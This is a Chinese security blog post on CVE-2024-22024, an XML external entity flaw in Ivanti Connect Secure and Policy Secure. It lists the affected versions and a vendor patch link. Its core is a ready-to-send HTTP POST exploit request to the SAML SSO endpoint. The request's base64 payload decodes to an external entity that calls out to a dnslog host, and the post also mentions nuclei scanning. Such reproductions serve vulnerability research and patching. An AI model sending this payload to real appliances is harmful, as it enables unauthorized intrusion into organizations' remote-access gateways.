Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

admin
admin
admin
140521
文章
117
评论
2024年5月23日14:57:59评论138 views字数 1071阅读3分34秒阅读模式
0x00写在前面

      本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍
Ivanti Connect Secure和Ivanti Policy Secure都是美国Ivanti公司的产品。Ivanti Connect Secure是安全远程网络连接工具。Ivanti Policy Secure是一个网络访问控制 (NAC) 解决方案。

Ivanti Connect Secure和Ivanti Policy Secure存在代码问题漏洞,该漏洞源于存在XML外部实体注入漏洞,允许攻击者在不知情的情况下访问某些受限资源。

0x02影响版本

Ivanti Connect_Secure 22.4,Ivanti Connect_Secure 9.1,Ivanti Connect_Secure 22.5

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

0x03漏洞复现

1.访问漏洞环境

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

2.对漏洞进行复现

POC (POT)

漏洞复现

POST /dana-na/auth/saml-sso.cgi HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeContent-Length: 176Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

base64解码

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

测试dnslog

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

3.nuclei工具测试(漏洞存在)

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)

Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月23日14:57:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Ivanti Connect Secure代码执行漏洞(CVE-2024-22024)https://cn-sec.com/archives/2769849.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息